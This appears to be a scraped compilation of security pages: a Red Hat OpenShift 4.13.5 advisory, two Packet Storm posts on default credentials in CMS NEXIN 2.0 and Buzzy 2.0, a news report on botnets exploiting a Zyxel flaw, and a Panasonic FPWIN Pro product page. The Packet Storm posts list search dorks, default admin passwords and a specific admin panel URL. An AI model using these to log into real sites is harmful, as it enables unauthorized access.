Red Hat Security Advisory 2023-4091-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the container images for Red Hat OpenShift Container Platform 4.13.5. Issues addressed include a denial of service vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: OpenShift Container Platform 4.13.5 security update  
Advisory ID:       RHSA-2023:4091-01  
Product:           Red Hat OpenShift Enterprise  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4091  
Issue date:        2023-07-20  
CVE Names:         CVE-2022-4304 CVE-2022-4450 CVE-2022-41717   
                   CVE-2022-41723 CVE-2022-46663 CVE-2023-0215   
                   CVE-2023-0361 CVE-2023-0464 CVE-2023-0465   
                   CVE-2023-0466 CVE-2023-1255 CVE-2023-1260   
                   CVE-2023-2253 CVE-2023-2650 CVE-2023-2700   
                   CVE-2023-3089 CVE-2023-24329 CVE-2023-24534   
                   CVE-2023-24536 CVE-2023-24537 CVE-2023-24538   
                   CVE-2023-24539 CVE-2023-27561 CVE-2023-29400   
                   CVE-2023-32067   
=====================================================================

1. Summary:

Red Hat OpenShift Container Platform release 4.13.5 is now available with  
updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container  
Platform 4.13.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing  
Kubernetes application platform solution designed for on-premise or private  
cloud deployments.

This advisory contains the container images for Red Hat OpenShift Container  
Platform 4.13.5 See the following advisory for the RPM packages for this  
release:

https://access.redhat.com/errata/RHSA-2023:4093

Space precludes documenting all of the container images in this advisory.  
See the following Release Notes documentation, which will be updated  
shortly for this release, for details about these changes:

https://docs.openshift.com/container-platform/4.13/release_notes/ocp-4-13-release-notes.html

Security Fix(es):

* golang: net/http: excessive memory growth in a Go server accepting HTTP/2  
requests (CVE-2022-41717)

* net/http, golang.org/x/net/http2: avoid quadratic complexity in HPACK  
decoding (CVE-2022-41723)

* distribution/distribution: DoS from malicious API request (CVE-2023-2253)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

All OpenShift Container Platform 4.13 users are advised to upgrade to these  
updated packages and images when they are available in the appropriate  
release channel. To check for available updates, use the OpenShift CLI (oc)  
or web console. Instructions for upgrading a cluster are available at  
https://docs.openshift.com/container-platform/4.13/updating/updating-cluster-cli.html

3. Solution:

For OpenShift Container Platform 4.13 see the following documentation,  
which will be updated shortly for this release, for important instructions  
on how to upgrade your cluster and fully apply this asynchronous errata  
update:  
https://docs.openshift.com/container-platform/4.13/release_notes/ocp-4-12-release-notes.html

You may download the oc tool and use it to inspect release image metadata  
for x86_64, s390x, ppc64le, and aarch64 architectures. The image digests  
may be found at  
https://quay.io/repository/openshift-release-dev/ocp-release?tab=tags

The sha values for the release are:

(For x86_64 architecture)  
The image digest is  
sha256:af19e94813478382e36ae1fa2ae7bbbff1f903dded6180f4eb0624afe6fc6cd4

(For s390x architecture)  
The image digest is  
sha256:d4d2c747fade057e55f64e02a34bb752bd2cd1484b02f029d0842d346f872870

(For ppc64le architecture)  
The image digest is  
sha256:48466f0b7c86292379c5d987ec37f0d4a4cc26a69357374e127a7293b230c943

(For aarch64 architecture)  
The image digest is  
sha256:e9afcbe007e2440d2b862dc7709138df73dd851421d69c7f39f195301e0cda53

All OpenShift Container Platform 4.13 users are advised to upgrade to these  
updated packages and images when they are available in the appropriate  
release channel. To check for available updates, use the OpenShift Console  
or the CLI oc command. Instructions for upgrading a cluster are available  
at  
https://docs.openshift.com/container-platform/4.13/updating/updating-cluster-cli.html

4. Bugs fixed (https://bugzilla.redhat.com/):

2161274 - CVE-2022-41717 golang: net/http: excessive memory growth in a Go server accepting HTTP/2 requests  
2178358 - CVE-2022-41723 net/http, golang.org/x/net/http2: avoid quadratic complexity in HPACK decoding  
2189886 - CVE-2023-2253 distribution/distribution: DoS from malicious API request

5. JIRA issues fixed (https://issues.redhat.com/):

OCPBUGS-10326 - Re-enable operator-install-single-namespace.spec.ts test  
OCPBUGS-11143 - [Azure] Replace master failed as new master did not add into lb backend   
OCPBUGS-11974 - User telemetry is broken (inaccurate) due to the fact that page titles are not unique.  
OCPBUGS-12206 - [4.13] Keep systemd journal using LZ4 compression (via new env var)  
OCPBUGS-12256 - ptp operator socket management need rework since a few test case fails due to cleaning up the file before other processes are terminated.  
OCPBUGS-12743 - [4.13] SNO cluster deployment failing due to authentication and console CO in degraded state  
OCPBUGS-12785 - [release-4.13] Enable/Disable plugin options are not shown on Operator details page  
OCPBUGS-13311 - Kubelet CA file not written by MCD firstboot  
OCPBUGS-13323 - [4.13] Bootimage bump tracker  
OCPBUGS-13642 - [release-4.13] OLM k8sResourcePrefix x-descriptor dropdown unexpectedly clears selections  
OCPBUGS-13747 - [4.13] cgroupv1 support for cpu balancing is broken for non-SNO nodes  
OCPBUGS-13752 - AdditionalTrustBundle is only included when doing mirroring  
OCPBUGS-13809 - OVN image pre-puller pod uses `imagePullPolicy: Always` and blocks upgrade when there is no registry  
OCPBUGS-13812 - [azure] Installer doesn't validate diskType on ASH which lead to install fails with unsupported disktype  
OCPBUGS-14030 - Invalid CA certificate bundle provided by service account token  
OCPBUGS-14166 - Make Serverless form is broken  
OCPBUGS-14189 - Route Checkbox getting checked even if it is unchecked during editing the Serverless Function form  
OCPBUGS-14251 - Add new console metrics to cluster-monitoring-operator telemetry configuration (4.13)  
OCPBUGS-14267 - [Openshift Pipelines] Metrics page is broken  
OCPBUGS-14310 - Could not import multiple resources via JSON (while YAML supports this)  
OCPBUGS-14318 - [release-4.13] gather podDisruptionBudget only from openshift namespaces  
OCPBUGS-14336 - [Openshift Pipelines] Link to Openshift Route from service is breaking because of hardcoded value of targetPort  
OCPBUGS-14426 - Failed to list Kepler CSV  
OCPBUGS-14459 - The MCD repeats a "State and Reason" log line even when nothing is happening  
OCPBUGS-14482 - Sync RHEL9 Dockerfiles to regular Dockerfiles  
OCPBUGS-14598 - Update Jenkins to use 4.13 images  
OCPBUGS-14773 - (release-4.13) gather "gateway-mode-config" config map from "openshift-network-operator" namespace  
OCPBUGS-14867 - When installing SNO with bootstrap in place it takes cluster-policy-controller 6 minutes to acquire the leader lease  
OCPBUGS-14916 - images: RHEL-8-based container image is broken  
OCPBUGS-14943 - visiting Configurations page returns error Cannot read properties of undefined (reading 'apiGroup')  
OCPBUGS-15031 - (release-4.13) Insights config not correctly deserialized  
OCPBUGS-15101 - IngressVIP getting attach to two nodes at once  
OCPBUGS-15130 - Helm Repository "Edit" button results in 404  
OCPBUGS-15139 - The whereabouts-reconciler should not set an hard-coded node selector on the kubernetes.io/architecture label  
OCPBUGS-15161 - CPMS: Surface cpms vs machine diff  
OCPBUGS-15171 - CPO doesn't skip AWS resource deletion for 'Unknown' OIDC state  
OCPBUGS-15187 - images: RHEL-8 container image is missing `xz`  
OCPBUGS-15224 - [4.13] openvswitch user is not in the hugetblfs group  
OCPBUGS-15225 - while/after upgrading to OKD 4.11 2023-01-14 CoreDNS has a problem with UDP overflows  
OCPBUGS-15228 - Create helm release page doesn't show a YAML editor when schema isn't available (httpd-imagestreams chart)  
OCPBUGS-15230 - Allow installer to use existing Azure NSG during OpenShift IPI install  
OCPBUGS-15246 - Bump to kubernetes 1.26.6  
OCPBUGS-15281 - Leftover IngressController Preventing Clean Uninstall  
OCPBUGS-15289 - GCP XPN Installs Require bindPrivateDNSZone Permission in host project  
OCPBUGS-15330 - CPMSO: fix linting issue comment in test  
OCPBUGS-15335 - PipelineRun failed with log 'Tasks Completed: 3 (Failed: 1, Cancelled 0), Skipped: 1.'  
OCPBUGS-15360 - Serverless functions UI warning is misleading  
OCPBUGS-15372 - [4.13z] Duplicate acls cause network policy failure for namespaces with long names (>61 chars)  
OCPBUGS-15376 - [4.13] Cleanup Tech debt: remove unused repo code  
OCPBUGS-15410 - [release-4.13] Add Git Repository (PAC) doesn't setup GitLab and Bitbucket configuration correct  
OCPBUGS-15434 - [GWAPI] [4.13.z] The DNS provider failed to ensure the record, invalid value for name (gcp)  
OCPBUGS-15457 - python-grpcio and python-protobuf are unneeded dependencies  
OCPBUGS-15463 - [release-4.13] Unable to set protectKernelDefaults from "true" to "false" in kubelet.conf [release-4.13]  
OCPBUGS-15465 - [CI Watcher] Testing uninstall of Business Automation Operator "attempts to uninstall the Operator and delete all Operand Instances, shows 'Error Deleting Operands' alert"  
OCPBUGS-15476 - Network Operator not setting its version and blocking upgrade completion  
OCPBUGS-15481 - [CI Watcher] Broken pipeline-plugin e2e tests: PipelineResource CRD isn't installed anymore  
OCPBUGS-15512 - HCP Service Loadbalancer uses default SecurityGroup  
OCPBUGS-15515 - CI fails on TestAWSELBConnectionIdleTimeout  
OCPBUGS-15557 - TUI stuck on agent installer network boot setup  
OCPBUGS-15580 - updated nmstate builds will not work for MCO  
OCPBUGS-15585 - [4.13] Cannot fix a misconfigured Egress Firewall  
OCPBUGS-15586 - [4.13] NetworkPolicy not working as expected when allowing inbound traffic from any namespace  
OCPBUGS-15589 - Dynamic conversion webhook clientConfig not retained as operator installs  
OCPBUGS-15591 - GCP bootstrap VM should allow SecureBoot setting on 4.13 clusters  
OCPBUGS-15606 - Can't use git lfs in BuildConfig git source with strategy Docker  
OCPBUGS-15608 - [release-4.13] Clean up old RHEL9 dockerfiles to reduce confusion  
OCPBUGS-15720 - Helm Chart installation form hangs on create if JSON-schema is using 2019-09 or 2020-20 standard revisions  
OCPBUGS-15721 - Helm Chart installation form hangs on create if JSON-schema contains unknown value format  
OCPBUGS-15722 - Helm Chart installation screen fails to render if JSON schema contains remote $refs  
OCPBUGS-15734 - [4.13] binary should be compiled on RHEL9  
OCPBUGS-15736 - TuneD reverts node level profiles on termination  
OCPBUGS-15738 - tuned daemonset rprivate default mount propagation with `hostPath: path: /`  volumeMount breaks CSI driver relying on multipath  
OCPBUGS-15746 - Alibaba clusters are TechPreview and should not be upgradeable  
OCPBUGS-15756 - [release-4.13] Bump Jenkins and Jenkins Agent Base image versions  
OCPBUGS-15777 - ironic-agent-image PRs permafailing due to udevadm command missing  
OCPBUGS-15782 - [OSD] There is no error message shown on node label edit modal  
OCPBUGS-15787 - Project admins cannot see 'Pipelines' section in 'import from git' from RHOCP4 web console  
OCPBUGS-15808 - [4.13.x] Downstream OLM PSA plug-in is disabled  
OCPBUGS-15848 - The upgrade Helm Release tab in OpenShift GUI Developer console is not refreshing with updated values.  
OCPBUGS-15892 - 9% of OKD tests failing on error: tag latest failed: Internal error occurred: registry.centos.org/dotnet/dotnet-31-centos7:latest: Get "https://registry.centos.org/v2/": dial tcp: lookup registry.centos.org on 172.30.0.10:53: no such host  
OCPBUGS-15962 - ovn-k8s-cni-overlay: /lib64/libc.so.6: version `GLIBC_2.34' not found on 4.12-to-4.13  
OCPBUGS-15965 - Active Endpoint Connection blocks cluster uninstallation  
OCPBUGS-16084 - [4.13] OCP 4.14.0-ec.3 machine-api-controller pod crashing   
OCPBUGS-7762 - openshift-tests does not file Azure Disk zone topology

6. References:

https://access.redhat.com/security/cve/CVE-2022-4304  
https://access.redhat.com/security/cve/CVE-2022-4450  
https://access.redhat.com/security/cve/CVE-2022-41717  
https://access.redhat.com/security/cve/CVE-2022-41723  
https://access.redhat.com/security/cve/CVE-2022-46663  
https://access.redhat.com/security/cve/CVE-2023-0215  
https://access.redhat.com/security/cve/CVE-2023-0361  
https://access.redhat.com/security/cve/CVE-2023-0464  
https://access.redhat.com/security/cve/CVE-2023-0465  
https://access.redhat.com/security/cve/CVE-2023-0466  
https://access.redhat.com/security/cve/CVE-2023-1255  
https://access.redhat.com/security/cve/CVE-2023-1260  
https://access.redhat.com/security/cve/CVE-2023-2253  
https://access.redhat.com/security/cve/CVE-2023-2650  
https://access.redhat.com/security/cve/CVE-2023-2700  
https://access.redhat.com/security/cve/CVE-2023-3089  
https://access.redhat.com/security/cve/CVE-2023-24329  
https://access.redhat.com/security/cve/CVE-2023-24534  
https://access.redhat.com/security/cve/CVE-2023-24536  
https://access.redhat.com/security/cve/CVE-2023-24537  
https://access.redhat.com/security/cve/CVE-2023-24538  
https://access.redhat.com/security/cve/CVE-2023-24539  
https://access.redhat.com/security/cve/CVE-2023-27561  
https://access.redhat.com/security/cve/CVE-2023-29400  
https://access.redhat.com/security/cve/CVE-2023-32067  
https://access.redhat.com/security/updates/classification/#moderate  
https://docs.openshift.com/container-platform/4.13/release_notes/ocp-4-12-release-notes.html

7. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJkuYVOAAoJENzjgjWX9erExUgP/2/25PbUv77tHgYG+Oj5rmcT  
oTnu0LnBLOsDXYGOomnrE/UZFvWtQr8lGWpvkHpZjJjg7IZo4vN4mUhK+z7dM+3M  
zuyV++GHDF/zr1XxYf6xWWWNtdCTwWsUKcb6FB4J+WCiUJ8PSYFY3lbPcvAbTamP  
Hj1JHc3/NxYswwfwBcmK+E4DX4y0XImRdu5+vIXZdp5dpTBehchnSa+Mgjt7vdwi  
rHi7CdAsHDrPQhThlIRmc17cwsqiZS760xxpx9UNHvix5UQA9ns+OcUx/dLaGR9E  
dp41kCebze5st+wpBMCPoOZEvHJIMjC6ODFVb4mzRbhbAbWJS6GZl2V783v5RGrr  
FemE7DDKKt6QEjZhT61GXVS9EdWdFrNii5kmgEiUc/F6Md0fHrPcdt5yxK0dhPZb  
3R/64vcMsHllsEStpg8s1aieAZbpmheylEKK+zf82Vz3nlBNX5kxi2IxCrl4nG6X  
KublzGkkKiNXS9rZqzPDRgtGAn5Qi01U9kUzVgdKGfMsyRnvAVDeZf/FUdOhCm7M  
h2Yt9M2cgPImRWatKkECpsAwcHbgGtsFL96/5z6CSOoXbqkB2xV6LVixsoa4ys76  
cHsXRPJFDU97Y1I9h1kJbro/N8UdPZSicVdsWrLYadujBrhaPq5MoW+B1FpayaDh  
+AfFGtVd9LRp5sYROCuT  
=2EuA  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4091-01

CMS NEXIN version 2.0 appears to leave default credentials installed after installation.

**CMS NEXIN 2.0 Insecure Settings**

Posted Jul 21, 2023

Authored by indoushka

CMS NEXIN version 2.0 appears to leave default credentials installed after installation.

tags | exploit

SHA-256 | 25b10702af932a169c8f962ba428cb35c1dcfb81a0c4d0c73e21de4f9e2d2054

Download | Favorite | View

**CMS NEXIN 2.0 Insecure Settings**

    ====================================================================================================================================| # Title     : CMS NEXIN engine v2.0 Insecure Settings Vulnerability                                                              || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 68.0(32-bit)                                               || # Vendor    : http://www.composeit.hu/                                                                                           |  | # Dork      : NEXIN engine v2.0                                                                                                  |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] appears to leave a default administrative account in place post installation.[+] Panel : http://wlugashotelcom/admin/[+] User : root & pass : job314Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,734)
*   Arbitrary (16,154)
*   BBS (2,859)
*   Bypass (1,733)
*   CGI (1,025)
*   Code Execution (7,236)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,334)
*   DoS (23,363)
*   Encryption (2,365)
*   Exploit (51,626)
*   File Inclusion (4,209)
*   File Upload (967)
*   Firewall (821)
*   Info Disclosure (2,755)
*   Intrusion Detection (890)
*   Java (3,034)
*   JavaScript (851)
*   Kernel (6,641)
*   Local (14,428)
*   Magazine (586)
*   Overflow (12,664)
*   Perl (1,423)
*   PHP (5,138)
*   Proof of Concept (2,337)
*   Protocol (3,583)
*   Python (1,531)
*   Remote (30,664)
*   Root (3,575)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,636)
*   Security Tool (7,874)
*   Shell (3,176)
*   Shellcode (1,212)
*   Sniffer (894)
*   Spoof (2,196)
*   SQL Injection (16,306)
*   TCP (2,397)
*   Trojan (687)
*   UDP (885)
*   Virus (664)
*   Vulnerability (31,710)
*   Web (9,621)
*   Whitepaper (3,748)
*   x86 (961)
*   XSS (17,862)
*   Other

**File Archives**

*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (1,993)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,793)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (349)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,237)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (484)
*   RedHat (13,597)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,755)
*   UNIX (9,267)
*   UnixWare (186)
*   Windows (6,565)
*   Other

CMS NEXIN 2.0 Insecure Settings

Buzzy News Viral Lists Polls and Videos version 2.0 appears to leave default credentials installed after installation.

**Buzzy News Viral Lists Polls And Videos 2.0 Insecure Settings**

Posted Jul 21, 2023

Authored by indoushka

Buzzy News Viral Lists Polls and Videos version 2.0 appears to leave default credentials installed after installation.

tags | exploit

SHA-256 | ef0029a51004a0f4fd1207577f144340dffe6a0657f6ace9160fd98579a7d596

Download | Favorite | View

**Buzzy News Viral Lists Polls And Videos 2.0 Insecure Settings**

    ======================================================================================================================================| # Title     : Buzzy - News Viral Lists Polls and Videos V 2.0 Insecure Settings Vulnerability                                      || # Author    : indoushka                                                                                                            || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit)                                               || # Vendor    : https://codecanyon.net/item/buzzy-news-viral-lists-polls-and-videos/13300279?s_rank=4                                |  | # Dork      : "buzzy /profile/admin/ Copyright © Buzzy. All rights reserved."                                                      |======================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  appears to leave default credentials installed after installation.[+]  Use Admin : admin@admin.com & Pass : admin[+]  http://127.0.0.1/clickhungamacom/Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,734)
*   Arbitrary (16,154)
*   BBS (2,859)
*   Bypass (1,733)
*   CGI (1,025)
*   Code Execution (7,236)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,334)
*   DoS (23,363)
*   Encryption (2,365)
*   Exploit (51,626)
*   File Inclusion (4,209)
*   File Upload (967)
*   Firewall (821)
*   Info Disclosure (2,755)
*   Intrusion Detection (890)
*   Java (3,034)
*   JavaScript (851)
*   Kernel (6,641)
*   Local (14,428)
*   Magazine (586)
*   Overflow (12,664)
*   Perl (1,423)
*   PHP (5,138)
*   Proof of Concept (2,337)
*   Protocol (3,583)
*   Python (1,531)
*   Remote (30,664)
*   Root (3,575)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,636)
*   Security Tool (7,874)
*   Shell (3,176)
*   Shellcode (1,212)
*   Sniffer (894)
*   Spoof (2,196)
*   SQL Injection (16,306)
*   TCP (2,397)
*   Trojan (687)
*   UDP (885)
*   Virus (664)
*   Vulnerability (31,710)
*   Web (9,621)
*   Whitepaper (3,748)
*   x86 (961)
*   XSS (17,862)
*   Other

**File Archives**

*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (1,993)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,793)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (349)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,237)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (484)
*   RedHat (13,597)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,755)
*   UNIX (9,267)
*   UnixWare (186)
*   Windows (6,565)
*   Other

Buzzy News Viral Lists Polls And Videos 2.0 Insecure Settings

Several distributed denial-of-service (DDoS) botnets have been observed exploiting a critical flaw in Zyxel devices that came to light in April 2023 to gain remote control of vulnerable systems.
"Through the capture of exploit traffic, the attacker's IP address was identified, and it was determined that the attacks were occurring in multiple regions, including Central America, North America,

Several distributed denial-of-service (DDoS) botnets have been observed exploiting a critical flaw in Zyxel devices that came to light in April 2023 to gain remote control of vulnerable systems.

"Through the capture of exploit traffic, the attacker's IP address was identified, and it was determined that the attacks were occurring in multiple regions, including Central America, North America, East Asia, and South Asia," Fortinet FortiGuard Labs researcher Cara Lin said.

The flaw, tracked as CVE-2023-28771 (CVSS score: 9.8), is a command injection bug affecting multiple firewall models that could potentially allow an unauthorized actor to execute arbitrary code by sending a specifically crafted packet to the targeted appliance.

Last month, the Shadowserver Foundation warned that the flaw was being "actively exploited to build a Mirai-like botnet" at least since May 26, 2023, indicating how abuse of servers running unpatched software is on the rise.

The latest findings from Fortinet suggest that the shortcoming is being opportunistically leveraged by multiple actors to breach susceptible hosts and corral them into a botnet capable of launching DDoS attacks against other targets.

This comprises Mirai botnet variants such as Dark.IoT and another botnet that has been dubbed Katana by its author, which comes with capabilities to mount DDoS attacks using TCP and UDP protocols.

"It appears that this campaign utilized multiple servers to launch attacks and updated itself within a few days to maximize the compromise of Zyxel devices," Lin said.

The disclosure comes as Cloudflare reported an "alarming escalation in the sophistication of DDoS attacks" in the second quarter of 2023, with threat actors devising novel ways to evade detection by "adeptly imitating browser behavior" and keeping their attack rates-per-second relatively low.

Adding to the complexity is the use of DNS laundering attacks to conceal malicious traffic via reputable recursive DNS resolvers and virtual machine botnets to orchestrate hyper-volumetric DDoS attacks.

"In a DNS Laundering attack, the threat actor will query subdomains of a domain that is managed by the victim's DNS server," Cloudflare explained. "The prefix that defines the subdomain is randomized and is never used more than once or twice in such an attack."

"Due to the randomization element, recursive DNS servers will never have a cached response and will need to forward the query to the victim's authoritative DNS server. The authoritative DNS server is then bombarded by so many queries until it cannot serve legitimate queries or even crashes all together."

UPCOMING WEBINAR

Shield Against Insider Threats: Master SaaS Security Posture Management

Worried about insider threats? We've got you covered! Join this webinar to explore practical strategies and the secrets of proactive security with SaaS Security Posture Management.

Join Today

Another noteworthy factor contributing to the increase in DDoS offensives is the emergence of pro-Russian hacktivist groups such as KillNet, REvil, and Anonymous Sudan (aka Storm-1359) that have overwhelmingly focused on targets in the U.S. and Europe. There is no evidence to connect REvil to the widely known ransomware group.

KillNet's "regular creation and absorption of new groups is at least partially an attempt to continue to garner attention from Western media and to enhance the influence component of its operations," Mandiant said in a new analysis, adding the group's targeting has "consistently aligned with established and emerging Russian geopolitical priorities."

"KillNet's structure, leadership, and capabilities have undergone several observable shifts over the course of the last 18 months, progressing toward a model that includes new, higher profile affiliate groups intended to garner attention for their individual brands in addition to the broader KillNet brand," it further added.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

DDoS Botnets Hijacking Zyxel Devices to Launch Devastating Attacks

A memory corruption vulnerability Panasonic Control FPWIN Pro versions 7.6.0.3 and all previous versions may allow arbitrary code execution when opening specially crafted project files.

   

With the innovative programming software Control FPWIN Pro, it takes minimal effort to achieve a maximum result with the PLCs.

**Programming software Control FPWIN Pro**

Control FPWIN Pro is the Panasonic programming software developed according to the international standard IEC 61131-3 (for Windows 10 and 11). Numerous libraries that incorporate a lot of our know-how ensure the reusability of ready-made functions and function blocks and save time for programming and debugging.

**Features**

1.  Structured Text (ST) programming editor
2.  Toolbar contains icons, which represents frequently used menus
3.  Delaration of variables
4.  Navigator provides an overview even for very complex projects
5.  Selection of Functions / Function blocks
6.  Ladder Diagram (LD) programming editor

**The most important FPWIN Pro highlights at a glance**

*   One software for all FP Series PLCs
*   5 programming languages (instruction list, ladder diagram, function block diagram, sequential function chart, structured text)
*   Well structured navigator provides effective overview of programming organizaton units (POUs), tasks, system registers, etc., simplifying project management
*   Reuse of ready made functions and function blocks saves time for programming and debugging
*   Programming, service, monitoring and diagnostics via RS232 (COM), Modem, Ethernet, USB
*   Forced ON/OFF of input and output contacts via the PC
*   Extensive comments - online documentation created hand in hand with the program
*   The name of variables, functions, function blocks and comments can be written in all languages thanks to Unicode
*   Improved programming comfort: snap function, automatic placement of newly inserted elements, existing connection retained while moving elements
*   Keyboard-control mode can accelerate programming
*   8 languages are supported: English, German, French, Italian, Spanish, Japanese, Korean, and Chinese
*   Real-time clock on the PLC can be set in the Software
*   All IEC functions support the FP7
*   New communication and pointer functions
*   New family of overloaded and type-safe instructions for 32-bit type PLCs (FP7) and 16-bit type PLCs
*   SD card instructions 

**Control FPWIN Pro ordering data**

Product

Order Number

License for Control FPWIN Pro V7. Programming software, full version for all FP series PLCs (including FP7)

FPWINPRO7\_LICENSE

**More information**

Video-tutorials

**Basic PLC video training**

Basic PLC course, giving an overview about programming with FPWIN Pro 7 software.

SErvice

**Control FPWIN Pro7**

Download software files and programming libraries for motion control and network protocols.

**Downloads**

Name

File Type

Size

Date

Language

PDF Brochure Automates programmables industriels

Catalog, Shortform

5.9 MB

09.04.2021

French

PDF Catálogo Resumen Autómatas Programables

Catalog, Shortform

13.3 MB

21.01.2022

Spanish

PDF Catálogo resumen - Gama de producto automatización industrial, 6215eues

Catalog, Shortform

5.9 MB

01.08.2021

Spanish

ZIP Control Configurator FM for integration in FPWIN Pro 7. Network Configurator including diagnostic functions for FP0H / FP2 / FP-Sigma Fieldbus Master Units(FMU).

Software

45.7 MB

09.09.2010

English

ZIP Control Configurator WD Version 1.77: setting software for Ethernet communication of FP7, FP0H, ELC500, Data Logger Light, PV200/500, HL-C21C, GT32T1/703/704, AFPX-COM5, FP-XH Ethernet type, LP-GS, K…

Software

7.3 MB

24.02.2021

English

PDF Control FPWIN Pro

Data sheet

835.3 KB

12.11.2018

German

PDF Control FPWIN Pro

Data sheet

833.7 KB

12.11.2018

English

PDF Control FPWIN Pro Befehlssatz

Manual

22.3 MB

01.12.2012

English

PDF Control FPWIN Pro Programming Manual

Manual

20.3 MB

01.07.2012

English

ZIP Control FPWIN Pro V 6.0 Reference Manual

Manual

5.5 MB

01.10.2008

English

ZIP Control FPWIN Pro V 6.0 Referenzhandbuch

Manual

5.9 MB

German

PDF Control FPWIN Pro, Programmation des automates : un logiciel pour toutes les applications

Data sheet

769.6 KB

French

ZIP Control FPWIN Pro7, free basic version 7.7.0.0 Supports all PLCs including the FP7, PLC program length limitation is 10000 steps. This version can update an older basic version. For Windows 10/11.

Software

462.6 MB

22.06.2023

English, german, italian, french, spanish, japanese, chinese, korean

ZIP Ethernet Client FPWIN Pro 7 library, Version 1.4.0. FBs, HTTP\_Client, FTP\_Client and EMAIL\_Client, for FP7CPS31ES, FP7CPS31E, FP7CPS41E, FP7CPS41ES. FB FTP\_Client for AFP0HC32EP and AFP0HC32ET.

Software, Library

990.3 KB

15.10.2021

English

PDF FP I/O Terminal Board Installation Instructions, MJEC-FPIOTB

Manual

1.1 MB

11.07.2022

English

PDF FP Serie Controllori Programmabili

Catalog, Shortform

13.4 MB

Italian

ZIP FP0DPS2 PROFIBUS DP-Slave GSD-File

Software, Library

1.2 KB

01.08.2008

English

PDF FP0H Positioning Unit RTEX User's Manual (FPWIN Pro7), WUME-FP0HRTEXPRO7-07

Manual

8.7 MB

14.02.2023

English

ZIP FP7 AD4 and AD8 software for reading analog inputs plus broken wire dedection. Small user library and sample program for FPWIN Pro 7.

Software, Library

32.1 KB

12.01.2022

English

PDF FPWIN Pro

Data sheet

775.5 KB

28.01.2016

Italian

ZIP FPWIN Pro project sample for FP7 AD4H/AD8 to read the analog input sampling buffer.

Software

11.2 KB

05.06.2018

English

ZIP FPWIN Pro projects in LD and ST code for positioning operations using the pulse output function. (Examples related to FP Sigma User's Manual.)

Software, Programming examples

872.1 KB

01.10.2011

English

ZIP FPWIN Pro projects in LD and ST code for positioning operations using the pulse output function. (Examples related to FP-X User's Manual.)

Software, Programming examples

934.4 KB

01.10.2011

English

ZIP FPWIN Pro projects in LD and ST code for positioning operations with a single-speed and a double-speed inverter. (Examples related to FP-X, FP Sigma, and FP0R User's Manuals.)

Software, Programming examples

306.5 KB

01.10.2011

English

PDF FPWIN Pro7 Introduction Guidance, WUME-FPWINPRO7-01

Manual

4.4 MB

16.07.2019

English

ZIP Fieldbus Master Module (FMU) Library for PROFIBUS-DP, DeviceNet and CANopen (FP-Sigma, FP2)

Software, Library

124.2 KB

01.08.2008

English

ZIP Fieldbus Master Units (FMU) Profibus, Profinet, CANopen and DeviceNet for FP7. Libraries, Samples and Docu V. 1.0.1.0 (for the use in FPWIN Pro 7).

Software, Library

4.5 MB

03.07.2018

English

ZIP Fieldbus Slave Unit(FNS) Libraries for FP0H, FP2 and FP-Sigma. Supported FNS slaves are PROFIBUS, DeviceNet, CANopen, BACnetIP, BACnetMSTP and PROFIINET IO. GSD, EDS and GSDML files are included. FPW…

Software, Library

835.9 KB

05.02.2021

English

PDF IEC60870: la nostra risposta a tante domande

Flyer

